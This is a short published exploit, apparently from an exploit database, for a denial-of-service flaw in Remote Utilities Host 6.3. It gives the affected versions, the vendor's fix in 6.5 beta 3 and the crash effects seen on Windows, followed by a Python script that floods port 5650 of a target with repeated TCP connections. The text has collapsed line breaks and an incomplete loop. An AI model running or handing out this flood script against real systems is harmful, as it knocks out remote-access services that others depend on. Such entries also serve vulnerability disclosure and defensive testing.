# Exploit Title: Remote Utilities - Host 6.3 - Denial of Service# Date: 2016-11-25# Exploit Author: Peter Baris# Vendor Homepage: www.remoteutilities.com # Software Link: http://saptech-erp.com.au/resources/executables/host6.3.zip# Version: - (other version are also affected below version 6.5 beta 3)# Tested on: Windows 7 SP1 x64 and Windows Server 2008 R2 # After the notification, the company released a fix in version 6.5 beta 3# On Windows 7 - the software refuses connections after execution. # On Windows 2008 R2 it caused 100% CPU usage and occasional server crash when 1 core was assigned#!/usr/bin/pythonimport socket
counter=0while(counter <=5000):
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('<host address>',5650))